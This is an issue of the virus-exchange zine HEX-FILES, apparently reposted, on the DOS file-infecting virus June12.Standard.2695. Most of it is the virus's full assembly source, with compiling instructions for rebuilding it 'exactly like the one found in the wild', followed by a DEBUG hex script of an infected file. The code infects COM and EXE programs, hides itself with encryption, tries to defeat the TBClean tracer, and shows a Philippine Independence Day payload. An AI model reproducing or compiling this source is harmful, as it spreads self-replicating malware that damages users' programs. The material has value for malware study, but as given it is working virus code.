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Hexfiles Issue 3 File 008

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Published in 
 · 9 Aug 2024

HEX-FILES No. 3 File 008

Virus Name: June12.Standard.2695

Alias: Jerusalem.Mabuhay.2695, June 14th, June_12th.2660,
June 12th.2265, June12, June12.2695, June12th,
June12th.2711, Mabuhay, Mabuhay.2695

June12.Standard.2695 is similar to June12.Standard.2660 and it
certainly came from the virus author. The only difference is that
there is an additional loop in the encryption of the virus
initialization routine and several instructions were added in the
initalization routine to check for encryption.

Because of these differences, the virus naturally is longer. It now
goes resident as a 2794-byte TSR. Its infective length is 2707 to
2722 bytes in COM infections and 2695 to 2710 bytes in EXE

Its differences with June12.Standard.2660 are noted below.

Which had been first June12.Standard.2660 or June12.Standard.2695. If
you take the ID of local AVs, June12.Standard.2660 (known here as
June12-A) came first. But who knows? Ask the author!


;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ To create a virus exactly like the one ÄÄ
;ÄÄÄÄÄ COMPILING ÄÄÄÄÄÄÄÄÄÄÄÄ found in the wild, TASM 2.01 or MASM 5.0 ÄÄ
;ÄÄÄÄÄ INSTRUCTION ÄÄÄÄÄÄÄÄÄÄÄÄ should be used. Other compilers might ÄÄ
;ÄÄÄÄÄ Program listing created by Putoksa Kawayan ÄÄÄÄÄÄ HEX-FILES No 3 ÄÄÄ

ExeHeader struc
ExeID dw ?
PageMod dw ?
PageCount dw ?
RelTab dw ?
HedSize dw ?
MinPara dw ?
MaxPara dw ?
SSeg dw ?
SPt dw ?
CxSum dw ?
CPt dw ?
CSeg dw ?
RelFrst dw ?
ExeHeader ends

June12 segment 'code'
assume cs:June12, ds:nothing

MemRelocate equ 3fch
Environment equ 2ch
June equ 6
_12th equ 12
BiosData equ 40h
MotorTimeOut equ BiosData
VideoPort equ 63h
TraceTrap equ ((offset NoTrace-offset AntiTrace)-2)
VirusStack equ (offset EndOfJune12+100h)-2
; virus entry point from an infected com program
jmp ComEntry

db 1ah
ComLowLength dw ?
SavedPsp dw ?
ExecParam dw 0,80h,0,5ch,0,6ch,0
ExeSp dw ?
ExeSs dw ?
ExeHost label dword
ExeIp dw ?
ExeCs dw ?
SavedMem db 3 dup (?)
DosInterrupt dd ?
ComHost dd ?
FileHandle dw ?
MemAllocFlag db ?
CallerAsciiz dd ?
FileAttribute dw ?
FileTypeFlag db ?
ErrorInterrupt dd ?
FileDate dw ?
FileTime dw ?
HandlerActive db ?
ExeReadBuff db 28 dup (?)
EncryptFlag db ?
FileDatTimeFlag db ?
FileAttribFlag db ?
ExeHiLength dw ?
ExeLoLength dw ?
PageSize dw 512
ParagraphSize dw 16
MaskDataEnd db ?
Command db 'COMMAND.'
Com db 'COM'
Exe db 'EXE'

;------------------ Payload Data

Text1 db 'June 12 - the Independence Day of the Philippines.'
FlagData dw 0220h,02dfh,2020h,-1
dw 0220h,012ah,0320h,02dfh,1c20h,-1
dw 0a20h,02dfh,1820h,-1
dw 0520h,015ch,01b3h,012fh,0620h,02dfh,1420h,-1
dw 0420h,01c4h,01c4h,010fh,01c4h,01c4h,0520h
dw 012ah,0320h,12dfh,-1
dw 0520h,012fh,01b3h,015ch,0620h,02dch,1420h,-1
dw 0a20h,02dch,1820h,-1
dw 0220h,012ah,0320h,02dch,1c20h,-1
dw 0220h,02dch,2020h,-1
FlagColor db 70h,71h,10h,70h,7eh,70h,71h,10h,70h,71h,10h,70h,7eh
db 7eh,7eh,70h,71h,10h,70h,7eh,7eh,7eh,7eh,7eh,70h,7eh
db 70h,41h,70h,7eh,7eh,7eh,70h,74h,40h,70h,74h,40h,70h
db 7eh,70h,74h,40h,70h,74h,40h
;' D e d i c a t e d t o M a n o n g E d d i e .'
;'M A B U H A Y A N G P I L I P I N A S ! '
Text2 db 'MDAeBdUiHcAaYt eAdN Gt oP IMLaInPoInNgA SE!d d i e .'

;------------------ National Anthem Data

Anthem01 dw offset Anthem05,offset Anthem05,offset Anthem04
dw offset Anthem04,offset Anthem06,offset Anthem03
dw offset Anthem06,offset Anthem03
Anthem02 dw offset Anthem09,offset Anthem09,offset Anthem08
dw offset Anthem08,offset Anthem10,offset Anthem07
dw offset Anthem11,offset Anthem07
Anthem03 dw 0d5bh,0e21h,0be4h,0d5bh,11cah,0be4h,0a98h,0a00h
dw 0a98h,0be4h,0a98h,0d5bh,0d5bh,0e21h,0be4h,0d5bh
dw 11cah,0be4h,0a98h,0a00h,0a98h,0be4h,002ch
Anthem04 dw 0d5bh,0e21h,0d5bh,0be4h,0be4h,11cah,11cah,0be4h
dw 0be4h,11cah,11cah,0a98h,096fh,08e9h,07f1h,08e9h
dw 0d5bh,0e21h,0d5bh,0be4h,0be4h,11cah,11cah,0be4h
dw 0be4h,11cah,11cah,0a98h,0a00h,0a98h,0be4h,0a98h
dw 0be4h,0d5bh,002ch
Anthem05 dw 0d5bh,0fdah,0d5bh,0a00h,0a00h,08e9h,08e9h,07f1h
dw 08e9h,0a00h,08e9h,07f1h,077eh,07f1h,08e9h,07f1h
dw 0a00h,08e9h,0a98h,0a98h,0a00h,002ch
Anthem06 dw 0d5bh,002ch
Anthem07 db 12,9,3,12,12,4,4,4,9,3,12,12,12,9,3,12,12,4,4,4,9,3
Anthem08 db 4,4,4,9,3,9,3,9,3,9,3,9,3,9,3,12,4,4,4,9,3,9,3,9
db 3,9,3,4,4,4,4,4,4,12
Anthem09 db 4,4,4,12,12,12,12,9,3,9,3,12,4,4,4,12,12,12,9,3,36
Anthem10 db 12
Anthem11 db 24
XorOperand db 9ch
; int 24 handler
xor al,al
; encrypts/decrypts payload data
push ax
push si
mov si,offset XorOperand
mov al,cs:[si]
xor cs:[si-1],al
dec si
cmp si,(MaskDataEnd-June12Entry)
jne MaskDataLoop
pop si
pop ax
; payload trigger determinant
; payload is released on June 12 of any year on 21/4b00
push ax
push bx
push cx
push dx
push di
push si
push es
push ds
mov ah,2ah
int 21h
cmp dh,June ; check for June 12
jne isNot
cmp dl,_12th
jne isNot
call ShowPayload
pop ds
pop es
pop si
pop di
pop dx
pop cx
pop bx
pop ax
; encrypts/decrypts int 21 handler
; the int 21 handler is divided into blocks
push si
mov si,offset MaskHandler1
not byte ptr cs:[si]
inc si
cmp si,offset MaskHandler2
jne MaskHandlerLoop1
mov si,offset MaskHandler3
not byte ptr cs:[si]
inc si
cmp si,offset MaskHandler4
jne MaskHandlerLoop2
mov si,offset MaskHandler5
not byte ptr cs:[si]
inc si
cmp si,offset MaskHandler6
jne MaskHandlerLoop3
pop si
; main entry point for the virus from an infected com program
pop es
mov ah,0efh
int 21h
cmp ah,0efh
jnb ComNotResident
cmp ax,25bh
jne ComNotResident
mov ah,0ffh
mov di,100h
mov si,10bh
push es
pop ds
mov cx,ds:ComLowLength
int 21h
mov ax,cs
mov ss,ax
mov sp,VirusStack
; entry point for the virus from an infected exe program
; trap for tracers which takes advantage of the prefetch
; tbclean chokes on this one!!!
jmp $+2
sub byte ptr cs:AntiTrace+1,TraceTrap
jmp short NoTrace
mov ax,4c00h
int 21h
cmp EncryptFlag,0
je Init
call MaskInit
push es
mov SavedPsp,es
mov ExecParam+4,es
mov ExecParam+8,es
mov ExecParam+12,es
mov ax,es
add ax,16
add ExeCs,ax
add ExeSs,ax
mov ah,0efh
add byte ptr AntiTrace+1,TraceTrap
int 21h
cmp ah,0efh
jnb NotResident
pop es
mov ss,ExeSs
mov sp,ExeSp
jmp ExeHost
; prepare to move virus code to PSP:100
; virus places the code to move the virus from the end of the file at
; 0:3fc the original content of which is saved and subsequently restored
xor ax,ax
mov es,ax
mov ax,es:MemRelocate
mov word ptr SavedMem,ax
mov al,byte ptr es:MemRelocate+2
mov SavedMem+2,al
mov word ptr es:MemRelocate,0a5f3h
mov byte ptr es:MemRelocate+2,0cbh
pop ax
add ax,16
mov es,ax
push cs
pop ds
mov cx,offset EndOfJune12+100h
shr cx,1
xor si,si
mov di,si
push es
mov ax,offset ContinueInit
push ax
db 0eah
dw MemRelocate,0
; routine executed after the virus had been moved to PSP:100
; it hooks int 21, executes the host program, and goes memory resident
mov ax,cs
mov ss,ax
mov sp,(((offset EndOfJune12-offset June12Entry)/100h)+3)*100h
xor ax,ax
mov ds,ax
mov ax,word ptr SavedMem
mov ds:MemRelocate,ax
mov al,SavedMem+2
mov byte ptr ds:MemRelocate+2,al
mov bx,sp
mov cl,4
shr bx,cl
add bx,32
mov ah,4ah
mov es,SavedPsp
int 21h
mov ax,3521h
int 21h
mov word ptr DosInterrupt,bx
mov word ptr DosInterrupt+2,es

assume cs:June12, ds:June12

push cs
pop ds
mov dx,offset isDos
mov ax,2521h
int 21h
mov es,SavedPsp
mov es,es:Environment
xor di,di
mov cx,7fffh
xor al,al
repne scasb
cmp es:[di],al
loopne FindFilename
mov dx,di
add dx,3

assume cs:June12, ds:nothing

xor al,al
mov HandlerActive,al
mov ax,4b00h
push es
pop ds
push cs
pop es
mov bx,offset ExecParam
cmp EncryptFlag,0 ;<<<
jne InitIsMasked ;<<<<< new to this variant
call MaskInit ;<<<
call DosInterrupt
cmp EncryptFlag,0 ;<<<
je InitNotMasked ;<<<<< new to this variant
call MaskInit ;<<<
push ds
pop es
mov ah,49h
int 21h
mov ah,4dh
int 21h
cmp EncryptFlag,0
jne InitMasked
call MaskInit
mov ah,31h
mov dx,offset EndOfJune12
mov cl,4
shr dx,cl
add dx,17
int 21h
; int 21 handler of the virus
; infects on 4b00 (EXEC) and 3d00 (file open read)
cmp ah,0efh
jne CheckRestoreHostCom
mov ax,25bh

cmp ah,0ffh
je RestoreHostCom
cmp ax,4b00h
jne CheckOpenFile
jmp short SetUpForInfection
cmp HandlerActive,0
jne ExitRelay01
cmp ah,3dh
je CheckOpenFileMode
jmp PassToDos

pop ax
pop ax
mov ax,100h
mov word ptr ComHost,ax
pop ax
mov ax,es
mov word ptr ComHost+2,ax
repe movsb
xor ax,ax
jmp ComHost

test al,7
jnz ExitRelay01
inc HandlerActive
mov FileHandle,-1
mov MemAllocFlag,0
mov word ptr CallerAsciiz,dx
mov word ptr CallerAsciiz+2,ds
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
push ds
push dx

assume cs:June12, ds:June12

push cs
pop ds
mov ax,3524h
int 21h
mov word ptr ErrorInterrupt,bx
mov word ptr ErrorInterrupt+2,es
mov dx,offset isErr
mov ax,2524h
int 21h

assume cs:June12, ds:nothing

pop dx
pop ds
call MaskData
call MaskHandler
mov di,dx
xor dl,dl
cmp byte ptr [di+01],':'
jne UseDefaultDrive
mov dl,[di]
and dl,1fh
mov ah,36h
int 21h
cmp ax,-1
jne DetermineFreeSpace
jmp RestoreErrorInterrupt
mul bx
mul cx
or dx,dx
jnz EnoughDiskSpace
cmp ax,offset EndOfJune12+100h
jb ExitRelay02
mov dx,word ptr CallerAsciiz
push ds
pop es
xor al,al
mov cx,41
repne scasb
mov si,word ptr CallerAsciiz
mov al,[si]
or al,al
jz EndOfAsciiz
cmp al,'a'
jb NextCharOfAsciiz
cmp al,'z'
ja NextCharOfAsciiz
sub byte ptr [si],20h
inc si
jmp GetNextCharOfAsciiz
push cs
pop es
push si
mov cx,3
sub si,cx
mov di,offset Com
xor al,al
mov FileTypeFlag,al
repe cmpsb
pop si
jne CheckIfExe
jmp short CheckIfCommand
inc FileTypeFlag
push si
mov cx,3
sub si,cx
mov di,offset Exe
repe cmpsb
pop si
je CheckIfCommand
jmp RestoreErrorInterrupt
mov cx,11
sub si,cx
mov di,offset Command
repe cmpsb
jne PrepareToInfect
jmp RestoreErrorInterrupt
mov ax,4300h
int 21h
jc ExitRelay03
mov FileAttribute,cx
jc ExitRelay04
mov ax,3d00h
int 21h
jc ExitRelay05
mov FileHandle,ax
mov ah,48h
mov bx,3
int 21h
jc ExitRelay06
inc MemAllocFlag
mov bx,FileHandle
mov ds,ax
mov cx,-1
mov dx,((offset EndOfJune12+100h)-offset isErr)
neg dx
mov ax,4202h
int 21h
jc ExitRelay07
add ax,((offset EndOfJune12+100h)-offset isErr)
mov ComLowLength,ax
mov cx,48
xor dx,dx
mov si,dx
mov ah,3fh
int 21h
jc ExitRelay08
mov cx,48
mov di,offset isErr
push cs
pop es
repe cmpsb
push ds
pop es
jne NotInfected
mov ah,3eh
int 21h
jmp RestoreErrorInterrupt
mov ah,49h
int 21h
jc ExitRelay09
dec MemAllocFlag
lds dx,CallerAsciiz
xor cx,cx
mov ax,4301h
int 21h
jc ExitRelay10
inc FileAttribFlag
mov bx,FileHandle
mov ah,3eh
int 21h
mov word ptr FileHandle,-1
mov ax,3d02h
int 21h
jc ExitRelay11
mov FileHandle,ax

assume cs:June12, ds:June12

mov ax,cs
mov ds,ax
mov es,ax
mov bx,FileHandle
mov ax,5700h
int 21h
mov FileDate,dx
mov FileTime,cx
inc cs:FileDatTimeFlag
xor cx,cx
mov dx,cx
mov ax,4200h
int 21h
jc ExitRelay12
cmp FileTypeFlag,0
je isCom
jmp isExe
; routine to infect com programs
; the host program is sandwiched between the virus relocator and the
; main virus code.
mov bx,1000h
mov ah,48h
int 21h
jnc CopyVirusJumper
mov ah,3eh
mov bx,FileHandle
int 21h
jmp RestoreErrorInterrupt
inc MemAllocFlag
mov es,ax
xor di,di
mov si,offset VirusJumper
mov cx,(offset MaskInit-offset VirusJumper)
repe movsb
mov ax,ComLowLength
add ax,(offset MaskInit-offset VirusJumper)
mov cx,ax
and ax,0fff0h
add ax,16
sub cx,ax
neg cx
xchg bp,cx
mov cl,4
shr ax,cl
add ax,16
mov word ptr es:[(VxSeg-VirusJumper)+1],ax
mov dx,di
mov cx,ComLowLength
mov bx,FileHandle
push ds
push es
pop ds
mov ah,3fh
int 21h
pop ds
jc ExitRelay13
add di,cx
xchg bp,cx
xor al,al
repe stosb
xor si,si
mov cx,offset EndOfJune12+100h
call MaskHandler
call MaskData
repe movsb
call MaskData
call MaskHandler
push es
pop ds
add di,cx
xor cx,cx
mov dx,cx
mov ax,4200h
int 21h
mov cx,di
xor dx,dx
mov ah,40h
int 21h
jc ExitRelay14
jmp PrepareToExit
; routine to infect exe programs
; the virus is appended to exe programs.
mov cx,28
mov dx,offset ExeReadBuff
mov ah,3fh
int 21h
jc ExitRelay15
mov ax,[ExeReadBuff].SSeg
mov ExeSs,ax
mov ax,[ExeReadBuff].SPt
mov ExeSp,ax
mov ax,[ExeReadBuff].CPt
mov ExeIp,ax
mov ax,[ExeReadBuff].CSeg
mov ExeCs,ax
mov ax,[ExeReadBuff].PageCount
cmp word ptr [ExeReadBuff].PageMod,0
je PageAligned
dec ax
mul PageSize
add ax,[ExeReadBuff].PageMod
adc dx,0
add ax,15
adc dx,0
and ax,0fff0h
mov ExeLoLength,ax
mov ExeHiLength,dx
add ax,offset EndOfJune12+100h
adc dx,0
jc ExitRelay16
div PageSize
or dx,dx
jz AlignedToPage
inc ax
mov [ExeReadBuff].PageCount,ax
mov [ExeReadBuff].PageMod,dx
mov ax,ExeLoLength
mov dx,ExeHiLength
div ParagraphSize
sub ax,[ExeReadBuff].HedSize
mov [ExeReadBuff].CSeg,ax
mov [ExeReadBuff].CPt,offset ExeEntry
mov [ExeReadBuff].SSeg,ax
mov [ExeReadBuff].SPt,VirusStack
xor cx,cx
mov dx,cx
mov ax,4200h
int 21h
jc ExitRelay17
mov cx,28
mov dx,offset ExeReadBuff
mov ah,40h
int 21h
jc ExitRelay18
cmp ax,cx
jne PrepareToExit
mov dx,ExeLoLength
mov cx,ExeHiLength
mov ax,4200h
int 21h
jc PrepareToExit
xor dx,dx
mov cx,offset EndOfJune12+100h
mov ah,40h
call MaskData
call MaskHandler
int 21h
call MaskHandler
call MaskData

assume cs:June12, ds:nothing

cmp word ptr FileHandle,-1
je RestoreErrorInterrupt
cmp FileDatTimeFlag,0
je NoDateTimeChange
mov bx,FileHandle
mov dx,FileDate
mov cx,FileTime
mov ax,5701h
int 21h
mov ah,3eh
int 21h
cmp FileAttribFlag,0
je RestoreErrorInterrupt
lds dx,CallerAsciiz
mov cx,FileAttribute
mov ax,4301h
int 21h
lds dx,ErrorInterrupt
mov ax,2524h
int 21h
cmp MemAllocFlag,0
je NoMemAllocated
mov ah,49h
int 21h
call MaskData
call MaskHandler
xor al,al
mov HandlerActive,al
mov bp,sp
mov ax,[bp+16]
cmp ax,4b00h
jne NotExec
call isTheDay
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp DosInterrupt
; virus relocator. this resets the segment where the virus will be executed
push cs
mov ax,cs
VxSeg:add ax,'PK'
push ax
xor ax,ax
push ax
; encrypts/decrypts virus initialization routine
push si
mov si,offset Init
MaskInitLoop1: ; <<<
not byte ptr cs:[si] ; <<<< new to this variant!
inc si ;<<<<< the init routines is now
cmp si,offset InitFirstMask ; <<<< encrypted in two blocks
jne MaskInitLoop1 ; <<<
mov si,offset InitNotMasked
not byte ptr cs:[si]
inc si
cmp si,offset MaskInitEnd
jne MaskInitLoop2
xor EncryptFlag,07
pop si
; display of payload routines.
; payload is display of the Philippine flag and playing of the Philippine
; national anthem -- "Lupang Hinirang". text dedicating the virus to
; Fidel Ramos the President of the Philippines at that time. "Manong" is a
; generic name used for a man much older than you are, and "Eddie" is the
; nickname of Ramos.
mov ax,719h
mov cx,0
mov dx,184fh
mov bh,7
int 10h
; draws the flag of the Philippines
push cx
mov cl,ah
xor ch,ch
mov ah,9
int 10h
pop cx

mov ah,2
int 10h
xchg cx,bp
mov al,[di]
mov ah,9
int 10h
inc dl
add di,2
xchg cx,bp
loop WriteText

assume cs:June12, ds:June12
; main routine to execute payload
mov ax,BiosData
mov ds,ax
mov si,VideoPort
cmp ax,3b4h
je ItsMono
mov al,3
jmp short FlipScreen
mov al,7
mov ah,0
int 10h
push cs
pop ds
mov ah,3
xor bh,bh
int 10h
push cx
mov ah,1
mov cx,201h
int 10h
call MaskData
mov si,offset Text1
mov dx,20fh
xor bh,bh
mov bl,0fh
mov ah,2
int 10h
mov cx,50
mov bp,1
mov ah,9
xchg cx,bp
int 10h
xchg cx,bp
inc dl
mov ah,2
int 10h
loop NextChar
xor bh,bh
mov dx,416h
mov si,offset FlagData
mov di,offset FlagColor
mov cx,9
mov ah,02
int 10h
cmp al,-1
je DrawNextRow
add dl,ah
mov bl,[di]
call DrawFlag
inc di
jmp MoveCursor
inc dh
mov dl,22
loop MoveCursor
mov di,offset Text2
mov dx,0f1dh
mov cx,22
mov bp,1
mov bl,8fh
call WriteText
mov di,offset Text2+1
mov dx,121bh
mov cx,26
mov bl,0eh
call WriteText
mov bx,0c350h
mov al,bl
out 40h,al
mov al,bh
out 40h,al
in al,61h
push ax
mov cx,8
mov di,cx
dec di
shl di,1
mov si,[di+offset Anthem01]
mov di,[di+offset Anthem02]
push cx
call MusicPlayer
pop cx
loop NextNote
pop ax
out 61h,al
xor al,al
out 40h,al
out 40h,al
mov ax,BiosData
mov ds,ax
mov di,MotorTimeOut
mov byte ptr [di],1
xor bh,bh
xor dx,dx
mov ah,2
int 10h
call MaskData
call ClearScreen
pop cx
mov ah,1
int 10h
; routine to play the national anthem
mov bx,[si]
mov al,0b6h
out 43h,al
mov ax,bx
out 42h,al
xchg ah,al
out 42h,al
in al,61h
or al,3
out 61h,al
mov cl,[di]
push ds
push si
mov ax,BiosData
mov ds,ax
mov si,MotorTimeOut
mov [si],cl
cmp byte ptr [si],0
jne HoldTheNote
pop si
pop ds
add si,2
inc di
cmp byte ptr [si],2ch
jne MusicPlayer
; this is my first generation routine
; this loads the virus to memory
mov ax,cs
mov ss,ax
mov sp,VirusStack
mov ds,ax
mov ah,0efh
int 21h
cmp ax,25bh
jne Pers2
call Pers1
call Pers1
call Pers1
mov ax,4cffh
int 21h
align 2
Pers1:mov ax,0e07h
xor bx,bx
int 10h
align 2
Pers2:call MaskData
call MaskInit
call MaskHandler
mov ax,es:Environment
mov es,ax
mov ah,49h
int 21h
mov ax,3521h
int 21h
mov word ptr DosInterrupt,bx
mov word ptr DosInterrupt+2,es
mov dx,offset isDos
mov ax,2521h
int 21h
call Pers1
mov ax,3100h
mov dx,((offset EndOfJune12-offset June12Entry)/16)+17
int 21h

June12 ends

end EndOfJune12


The following debug script contains a file infected by a virus
compiled from the above program listing using TASM 2.01.

MASM 5.0 would also produce a similar virus.


E 0100 0E 8C C8 05 2F 00 50 33 C0 50 CB E9 D4 01 0D 20
E 0110 20 20 0D 0A 4D 61 62 75 68 61 79 21 0D 0A 0A 54
E 0120 68 69 73 20 69 73 20 4A 75 6E 65 31 32 2E 53 74
E 0130 61 6E 64 61 72 64 2E 32 36 39 35 20 76 69 72 75
E 0140 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75 20
E 0150 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69 70 70
E 0160 69 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20 74
E 0170 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48 45
E 0180 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 33 0D 0A 0A
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E 0640 D1 FE F9 E7 FF 4B 10 D1 7F F9 DF FC FA 32 DE 7F
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E 0760 00 4B 75 02 EB 2E 2E 80 3E 3B 00 00 75 05 80 FC
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E 0820 C3 85 88 FC 7F D3 DF B9 14 13 F1 F8 A9 46 FC FF
E 0830 D4 0E 40 93 FF CD 3F D1 5D CD FF 0C 59 A1 8A FD
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E 0850 0C 59 A1 8B FC 16 93 FD 46 F4 FF D4 0E 40 9B FF
E 0860 0C 59 8A FC 16 A2 FD 47 FF BC 32 DE 8D FA D1 76
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E 0880 4B B7 44 FC FF 32 DE 8D E6 D1 01 F9 D4 FF D1 74
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E 0980 74 E1 D6 FF E1 F9 E0 4B C0 32 DE E0 8D CF FC 06
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E 0AE0 32 C0 2E A2 3B 00 8B EC 8B 46 10 3D 00 4B 75 03
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E 0B30 B8 19 07 B9 00 00 BA 4F 18 B7 07 CD 10 C3 51 8A
E 0B40 CC 32 ED B4 09 CD 10 59 C3 B4 02 CD 10 87 CD 8A
E 0B50 05 B4 09 CD 10 FE C2 83 C7 02 87 CD E2 EB C3 B8
E 0B60 40 00 8E D8 BE 63 00 AD 3D B4 03 74 04 B0 03 EB
E 0B70 02 B0 07 B4 00 CD 10 0E 1F B4 03 32 FF CD 10 51
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E 0B90 02 32 FF B3 0F B4 02 CD 10 B9 32 00 BD 01 00 AC
E 0BA0 B4 09 87 CD CD 10 87 CD FE C2 B4 02 CD 10 E2 EF
E 0BB0 32 FF BA 16 04 BE A4 00 BF 12 01 B9 09 00 B4 02
E 0BC0 CD 10 AD 3C FF 74 0A 02 D4 8A 1D E8 70 FF 47 EB
E 0BD0 ED FE C6 B2 16 E2 E7 BF 40 01 BA 1D 0F B9 16 00
E 0BE0 BD 01 00 B3 8F E8 61 FF BF 41 01 BA 1B 12 B9 1A
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E 0C00 40 E4 61 50 B9 08 00 8B F9 4F D1 E7 8B B5 74 01
E 0C10 8B BD 84 01 51 E8 2C 00 59 E2 EC 58 E6 61 32 C0
E 0C20 E6 40 E6 40 B8 40 00 8E D8 BF 40 00 C6 05 01 32
E 0C30 FF 33 D2 B4 02 CD 10 FA E8 40 F9 E8 F2 FE 59 B4
E 0C40 01 CD 10 C3 8B 1C B0 B6 E6 43 8B C3 E6 42 86 E0
E 0C50 E6 42 E4 61 0C 03 E6 61 8A 0D 1E 56 B8 40 00 8E
E 0C60 D8 BE 40 00 88 0C 80 3C 00 75 FB 5E 1F 83 C6 02
E 0C70 47 80 3C 2C 75 CE C3 8C C8 8E D0 BC 85 0A 8E D8
E 0C80 4D 28 0E 00 10 5B 02 75 54 52 41 50 45 58 45 00
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E 0CD0 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75 20
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E 0CF0 69 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20 74
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E 0D10 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 33 0D 0A 0A
E 0D20 48 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50 75
E 0D30 74 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61 72
E 0D40 65 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62 6C
E 0D50 65 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69 6D
E 0D60 70 6C 69 65 64 0D 0A 61 6E 64 2F 6F 72 20 69 6D
E 0D70 61 67 69 6E 61 72 79




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